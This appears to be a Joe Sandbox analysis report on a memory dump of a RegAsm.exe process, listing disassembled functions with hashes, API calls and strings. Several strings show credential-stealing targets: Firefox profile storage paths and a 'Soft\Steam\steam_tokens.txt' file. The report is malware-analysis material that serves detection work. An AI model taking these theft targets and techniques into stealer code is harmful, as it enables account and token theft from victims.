Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: ef6d74898027ad6eb24876a3ef862428bdf75f63696f96cc2aec2ebde79efefc
Instruction ID: b5c4d91d2a0d7fad5bfdff2e38cae30630360365683915bd1cfd31f74e2065e6
Opcode Fuzzy Hash: ef6d74898027ad6eb24876a3ef862428bdf75f63696f96cc2aec2ebde79efefc
Instruction Fuzzy Hash: 8A81FFF5A053028BC700CF18C882BD7B7E5EFA8710F044968F98597296E775E985CBD2

Function 1B7A78F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

?, xrefs: 1B7A794A
*, xrefs: 1B7A7982

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: 97b21ccca5d38b48b1aa26f28d019c3cda8d083bcde85287fda522ff660b2b07
Instruction ID: d80758a8c656623534bf204be00932e6b121106ee3a241f6532283710add6d53
Opcode Fuzzy Hash: 97b21ccca5d38b48b1aa26f28d019c3cda8d083bcde85287fda522ff660b2b07
Instruction Fuzzy Hash: DD71F3B0A083529FD7558F38C88479BFBE6EF85600F084A6EF8C687211D775D946CB92

Function 0040BC44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BC49

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040B616: _EH_prolog.MSVCRT ref: 0040B61B
Part of subcall function 0040B616: wsprintfA.USER32 ref: 0040B644
Part of subcall function 0040B616: FindFirstFileA.KERNEL32(?,?), ref: 0040B65B
Part of subcall function 0040B616: StrCmpCA.SHLWAPI(?,00426F3C), ref: 0040B678
Part of subcall function 0040B616: StrCmpCA.SHLWAPI(?,00426F40), ref: 0040B692
Part of subcall function 0040B616: lstrlenA.KERNEL32(00000000,00426C7F,00000000,?,?,?,00426F44,?,?,00426C7E), ref: 0040B742

Strings

.metadata-v2, xrefs: 0040BD06
\storage\default\, xrefs: 0040BC8A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
String ID: .metadata-v2$\storage\default\
API String ID: 2418158533-762053450
Opcode ID: 4ddd983ad9ba4f941848d4b7b7757e13a493dcf08297ff2889b28fc747cc79b1
Instruction ID: 28b1415d24dfa6437f98f288c8e0b38d0f3aa169e87c1d4957936d77c349aed5
Opcode Fuzzy Hash: 4ddd983ad9ba4f941848d4b7b7757e13a493dcf08297ff2889b28fc747cc79b1
Instruction Fuzzy Hash: 39619330D05288EACB09FBE5D556BDDBBB46F19308F50415EF415632C2DBB82788CBA6

Function 1B69D0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1B69D213

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 06ea0b6301dc380eb526b1176686991807b18dd605b5c2e28c65808c26097a4b
Instruction ID: e2d5bf9cb43205c7f172aec9a488e3fe322e675962361ff3c99a15a28c9bea6b
Opcode Fuzzy Hash: 06ea0b6301dc380eb526b1176686991807b18dd605b5c2e28c65808c26097a4b
Instruction Fuzzy Hash: E7415AF78043428FEB108A28FC427DA7B96AF71360F044A39EDD5933D2E626E548C352

Function 1B6955D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 1B6956D1
winDelete, xrefs: 1B69569C

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: 1c0b255680a2634bc185f9b3bf0728d84a4c354ff4e7934852ac540c8a65bd39
Instruction ID: 916fae0a9aa538bf9e4bdb3acbc5c8f3af561235c176f96adee9498959bf5b65
Opcode Fuzzy Hash: 1c0b255680a2634bc185f9b3bf0728d84a4c354ff4e7934852ac540c8a65bd39
Instruction Fuzzy Hash: 4C314CF2E913238FDB042E38BDC89EA7758E761A61F010536E94BC61E1DA21C45CC6A1

Function 1B69D300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1B69D3D5

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 39532d4373c88ada7baa3d9a55d627533ff045486c43de5f71f8e5ab46cac0e7
Instruction ID: 950ecfe416a33ec62cd9414b7c88bb69fe88cf1949916564b0b933cec65874e1
Opcode Fuzzy Hash: 39532d4373c88ada7baa3d9a55d627533ff045486c43de5f71f8e5ab46cac0e7
Instruction Fuzzy Hash: 31318EF29042255FDF104D14BC01BE637159BB3326F1842F9F895AB3D2D127E802C2A0

Function 1B77DEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1B77DF4F
sqlite_stat1, xrefs: 1B77DF30

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
API String ID: 0-3572622772
Opcode ID: e52bddcb15b9a96681a1eff41721a58571ab5d41aa1858e34d28e7c1d30af186
Instruction ID: 0612183ab5f39e11e0d4674aca02cb34f07aec7ffb0895fb836fe83b3e820ae9
Opcode Fuzzy Hash: e52bddcb15b9a96681a1eff41721a58571ab5d41aa1858e34d28e7c1d30af186
Instruction Fuzzy Hash: B921B6B6A013415FDF10EF25EC84EAEB7A4AF81A24B05456CFC94A7251D321F855CBE1

Function 1B817E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 1B817ED9

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: 9ae69437e43812a92446b49aab54d3bbbff37b5e33a5bf80a612e02481a91b8e
Instruction ID: 60bec871c75ddab20128c00d1f8fb53d11ad5df6f10727cfa24bd77f5f6182f6
Opcode Fuzzy Hash: 9ae69437e43812a92446b49aab54d3bbbff37b5e33a5bf80a612e02481a91b8e
Instruction Fuzzy Hash: 7F21B3F1681222AFEB04AF64DC89FDB37E8EF04E65F140429F949D6190DB30D958D7A2

Function 1B6AF740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1B6AF752

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
API String ID: 0-2071071404
Opcode ID: 9b8944bc573d7d8cbe45675064b6aa9e0f75616f4ac64bcdb197b70f5c7fd63d
Instruction ID: 1cdf41b82e7704175725ef8f385df38f8e0a3fa65bfb94989a94bc2b56336c08
Opcode Fuzzy Hash: 9b8944bc573d7d8cbe45675064b6aa9e0f75616f4ac64bcdb197b70f5c7fd63d
Instruction Fuzzy Hash: C211ABF5580212AFE6046F39ECC9FEB33ACEB54A15F00012AF905D2190E760FC58CB66

Function 1B68141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 1B860E84
GetXStateFeaturesMask, xrefs: 1B860E34

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: 49882a5cbf98c5051f0c2674bbcc89656e20f7c30570e36894156b09c2b19274
Instruction ID: 941605d4b47d6b9f90401f5a726d5949589a6ce63cb6f0c8c4a5d0d703597f01
Opcode Fuzzy Hash: 49882a5cbf98c5051f0c2674bbcc89656e20f7c30570e36894156b09c2b19274
Instruction Fuzzy Hash: A4018F3A584228B7CB112AA5CC45ECE7F26EB54FA2F054012FD196B310EA729872D6E4

Function 0040EC31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040EC76
memcpy.MSVCRT ref: 0040ECA6

Strings

string too long, xrefs: 0040EC71

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentmemcpystd::_
String ID: string too long
API String ID: 1835169507-2556327735
Opcode ID: 524a70902acbee817e7c2225f571579b0f85964725ce8f35b52a0cc4692501ae
Instruction ID: 8b9cda667150de8da229166ed374495bd93bd7f8ad643b39e6e75cd412ccdd48
Opcode Fuzzy Hash: 524a70902acbee817e7c2225f571579b0f85964725ce8f35b52a0cc4692501ae
Instruction Fuzzy Hash: F011E2313086109BEB349F2F884596AB7A9EF41710B140D3FF446AB3C1CB7AD925879D

Function 0040ECCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040ECE4

Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAC5
Part of subcall function 0041FAB0: __CxxThrowException@8.LIBCMT ref: 0041FADA
Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAEB

Part of subcall function 0040EAD3: std::_Xinvalid_argument.LIBCPMT ref: 0040EAE4

memcpy.MSVCRT ref: 0040ED3F

Strings

invalid string position, xrefs: 0040ECDF

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
String ID: invalid string position
API String ID: 214693668-1799206989
Opcode ID: d7c3ee636dfde35e99b2e48b6ec15f19c159fbeec3d8ddae442131194ee78d4f
Instruction ID: 38878d5cb8b98c52d85073cf0eec1802e8f1f86065acee281559ebaee1538d13
Opcode Fuzzy Hash: d7c3ee636dfde35e99b2e48b6ec15f19c159fbeec3d8ddae442131194ee78d4f
Instruction Fuzzy Hash: B611C432304211DBDB249E1AD881A6AB3A5EF95710B100D3FF917A73C1C7B9DD6187AE

Function 1B6B5350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 1B6B539B

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 228469d85a49c7d64841d7fbe72a9087def0d6a70335d86845393053a3bda1a2
Instruction ID: ac3cb798463d5853af162ff3041319a937a8e388f38d7b3d2baa16cabb48e7fe
Opcode Fuzzy Hash: 228469d85a49c7d64841d7fbe72a9087def0d6a70335d86845393053a3bda1a2
Instruction Fuzzy Hash: 651160B66093408BCB04DF19C85279FB7E4BFE8314F84482EE48A87290E774E508CB97

Function 00415966 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041596B

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

lstrlenA.KERNEL32(00000000,00000000,?,00000000,0042770A), ref: 004159BC

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Soft\Steam\steam_tokens.txt, xrefs: 004159D4

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 40794102-3507145866
Opcode ID: 6e099bdc78ef3f6b28fd805c007afa12f89ebb41604d3afa3c7efb165c798aa8
Instruction ID: b262896f77ba43b15df3a5861651c341728552a40ae0278935f2fa84f0773dd9
Opcode Fuzzy Hash: 6e099bdc78ef3f6b28fd805c007afa12f89ebb41604d3afa3c7efb165c798aa8
Instruction Fuzzy Hash: 55214D71900148EACB05FBF5C956BDDBB74AF19308F50815EE412721D2EBB827C8CAA6

Function 0040E91A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040E930

Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAC5
Part of subcall function 0041FAB0: __CxxThrowException@8.LIBCMT ref: 0041FADA
Part of subcall function 0041FAB0: std::exception::exception.LIBCMT ref: 0041FAEB

